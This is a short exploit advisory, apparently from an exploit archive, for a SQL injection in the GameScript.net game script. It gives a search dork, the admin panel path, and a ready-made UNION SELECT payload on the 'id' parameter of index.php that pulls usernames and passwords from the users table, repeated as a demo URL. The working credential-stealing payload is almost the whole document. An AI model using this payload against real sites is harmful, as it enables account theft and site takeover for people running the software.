1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
Author :FormatXformat Home : Tkurd.net Script : http://www.gamescript.net Vulnerabilities : SQL Injection Dork: Copyright © 2005 - 2006 GameScript.net. All Games Copyright © To Their Respective Owners. All Rights Reserved. Exploit: /index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users-- Admin page: admincp Demo : http://server/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users-- |